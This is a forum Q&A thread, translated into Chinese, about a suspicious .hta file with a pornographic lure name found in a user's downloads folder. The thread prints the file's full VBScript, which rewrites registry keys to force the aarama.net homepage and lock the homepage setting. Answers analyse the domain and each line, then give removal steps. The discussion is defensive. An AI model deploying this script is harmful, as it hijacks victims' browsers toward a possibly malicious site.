帮助...病毒？妥协了？(aarama.net)

Question

请帮助我确定我的计算机是否已被入侵。

我还不确定这是什么……我还在浏览我在“研究”期间发现的一些 JavaScript（我的级别 = 初学者）文件……

故事：

1. Windows 7 x64 Professional、Eset Smart Security 4.2.71.2、最新版 Firefox、最新版 Chrome、IE 8

2. 我在 Chrome 的默认下载文件夹中找到了一个文件adam-liseli-kizi-otele-goturup-sikiyor.avi.hta 它是一个 VB 脚本：

   Set shell = CreateObject("WScript.Shell")
   shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"
   shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
   shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
   shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"
   shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" 
   self.Close
   

3. 我关注了aarama.net，发现有一个钓鱼网站（我认为）看起来像谷歌，其中包含很多我现在正在尝试理解的 JavaScript。

Answer 1

好吧，做一些网络级别的挖掘，我可以告诉你这么多：

1. 该域是在 20 天前注册的。
2. 注册商在卢森堡，但电话号码在丹麦。
3. 该网站似乎是土耳其语。
4. 域名所有者隐藏在 PrivacyProtect 后面
5. 该站点由旧金山的 CloudFlair 托管。

总而言之，它看起来非常狡猾：

1. 这是一个新域名
2. 注册详情不加
3. 隐藏注册域名的人不一定是坏事，但有人会这样做
4. CloudFlare 提供免费帐户，只需很少检查。

快速浏览一下 javascript 并在 Links 中使用该站点并没有抛出任何令人讨厌的东西，但是我还没有正确分析 JS（现在已经接近午夜了）。早上我会挖得更多。

如果您确实发现它肯定是恶意软件，那么将调用 CloudFlare 以提醒他们注意——他们可能会立即关闭该站点。

更新

aarama.net 已转移到德国的托管设置，该设置因托管机器人和其他狡猾的站点 (your-server.de) 而臭名昭著。

Answer 2

我不会讲太多的剧本，但这个的意图似乎很清楚。

Set shell = CreateObject("WScript.Shell")

第一行，我不完全确定。然而，一些谷歌搜索似乎证实了我的想法，即这是一个相当标准的脚本开场白。

其余的行似乎正在设置各种注册表项。

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"

这个为 Internet Explorer 添加了一个新的 URL 前缀。本质上，任何时候 IE 被告知请求以“mirc”开头的资源。并且没有指定协议，在处理之前会在地址前插入“ http://aarama.net/ ”。因此，如果您在地址栏中输入“mirc.google.com”，IE 会将其翻译为“ http://aarama.net/mirc.google.com ”。这可能有助于恶意站点（或下载的恶意软件）上的其他一些脚本发挥作用。

shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"  
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"

这些添加了通常通过 Internet Explorer 实现组策略控制的注册表项。您可能会发现无法再通过控制面板更改 IE 主页。

shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"  
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" 

这些将“ http://aarama.net/ ”设置为您的主页 - 确保您至少访问该站点一次，并且有机会成为任何可能存在的网络钓鱼诈骗或恶意代码的受害者。当然，较早的键将确保您不会只访问一次，因为您无法更改主页。

self.Close

再说一次，我真的不会说剧本。但我认为这个很明显结束了。

您应该对这些信息做一些事情：

1.) （太晚了） 不要去那个网站。

2.) 有一些很好的防病毒/反恶意软件程序可以通过您的机器进行挖掘。我的建议是 Avast！启动时扫描、Malwarebytes 和 SpyBot Search & Destroy。如果可能，请使用单独的、已知良好的一次性机器进行扫描。或者，获取用于扫描的优质 LiveCD。

3.) 检查您的注册表以获取脚本创建的值。如果它们仍然存在，请备份您的注册表，然后删除创建的值或将它们更改为您的首选设置。前三个应该被丢弃。最后两个，设置为您的偏好或“about:blank”。

4.) 如果您在此之后发现系统上有任何可疑活动，就该采用“轨道核弹”方法了。希望你有好的备份。